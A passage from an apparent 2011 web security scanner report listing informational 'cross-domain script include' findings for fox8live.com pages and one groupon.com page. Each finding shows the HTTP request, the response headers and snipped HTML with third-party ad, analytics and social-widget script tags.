<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.29. http://www.fox8live.com/business/iframe_financialticker.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /business/iframe_financialticker.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business/iframe_financialticker.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uts=12; __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:02 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:39:02 GMT
Age: 1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 5216
Connection: keep-alive
Content-Length: 5216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.30. http://www.fox8live.com/business/iframe_indexwatch.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /business/iframe_indexwatch.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /business/iframe_indexwatch.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uts=12; __qca=P0-44190619-1304954806906

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:04 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:39:00 GMT
Age: 4
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 5204
Connection: keep-alive
Content-Length: 5204


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.31. http://www.fox8live.com/content/aboutus/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/aboutus/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /content/aboutus/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:34 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:40:52 GMT
Age: 43
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 29278
Connection: keep-alive
Content-Length: 29278


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.32. http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/news/lee_zurik_investigation/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /content/news/lee_zurik_investigation/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:44 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:41:05 GMT
Age: 39
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 40317
Connection: keep-alive
Content-Length: 40317


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.33. http://www.fox8live.com/content/news/seregni/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/news/seregni/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /content/news/seregni/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/news/lee_zurik_investigation/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:44 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:41:08 GMT
Age: 36
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 43733
Connection: keep-alive
Content-Length: 43733


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.34. http://www.fox8live.com/content/news/watercooler/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /content/news/watercooler/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /content/news/watercooler/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/news/seregni/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:27 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:43:27 GMT
Age: 0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 27624
Connection: keep-alive
Content-Length: 27624


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.35. http://www.fox8live.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:34 GMT
Server: PWS/1.7.2.1
X-Px: rf-ms iad-agg-n30 ( iad-agg-n22), ht iad-agg-n22.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:40:50 GMT
Age: 44
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 102042
Connection: keep-alive
Content-Length: 102042


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<br />
       

<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.36. http://www.fox8live.com/entertainment/horoscopes/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /entertainment/horoscopes/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /entertainment/horoscopes/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/content/aboutus/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:34 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:43:33 GMT
Age: 1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 22933
Connection: keep-alive
Content-Length: 22933


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.37. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/wireless/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:38 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n33), ms iad-agg-n33 ( origin)
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 57286
Connection: keep-alive
Content-Length: 57286


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<meta name="alexaVerifyID" content="6_05Z3bgdqMgJ7MwPLDUl06ev-8" /><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=inergizedm"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
<script src="http://idm.img.entriq.net/dayportcore/dpm/DayPortPlayers.js?v=20070107" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.38. http://www.fox8live.com/news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/local/story/St-Bernard-prepares-for-rising-Mississippi-River/vJUO9a9n60iNAXZ6QCm2oQ.cspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HitCount_f50e95bc-67af-48eb-8d01-767a4029b6a1_0=1; uts=12; __qca=P0-44190619-1304954806906; AxData=; Axxd=1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:42 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n20), ms iad-agg-n20 ( origin)
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 60505
Connection: keep-alive
Content-Length: 60505


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
<meta name="alexaVerifyID" content="6_05Z3bgdqMgJ7MwPLDUl06ev-8" /><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=inergizedm"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
<script src="http://idm.img.entriq.net/dayportcore/dpm/DayPortPlayers.js?v=20070107" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.39. http://www.fox8live.com/rss/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /rss/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /rss/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:43 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:41:02 GMT
Age: 41
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 27462
Connection: keep-alive
Content-Length: 27462


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.40. http://www.fox8live.com/wireless/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /wireless/default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /wireless/default.aspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:39 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n30.panthercdn.com
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:40:59 GMT
Age: 41
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 20605
Connection: keep-alive
Content-Length: 20605


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
<div id="fbabove"><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://w11.localadbuy.com/banners/ajtg.js"></script>
...[SNIP]...

18.41. http://www.groupon.com/learn

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /learn

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /learn HTTP/1.1
Host: www.groupon.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; visited=visit_1; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Mon, 09 May 2011 15:38:30 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:38:30 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:38:30 GMT; HttpOnly
Status: 200
ETag: "0345c004e46753e8c959a4f64568fdd0"
X-Runtime: 100
Cache-Control: private, max-age=0, must-revalidate
Connection: close

<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie6" lang="en" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:groupon="http://groupon.com/ns/#" xmlns="http://www.w3.org/1999/xhtml"> <![endif]-->
<
...[SNIP]...
</script>

<script src="http://assets1.grouponcdn.com/javascripts/common/groupon_finch_init.js?m321rSc4" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.10/jquery-ui.min.js" type="text/javascript"></script>
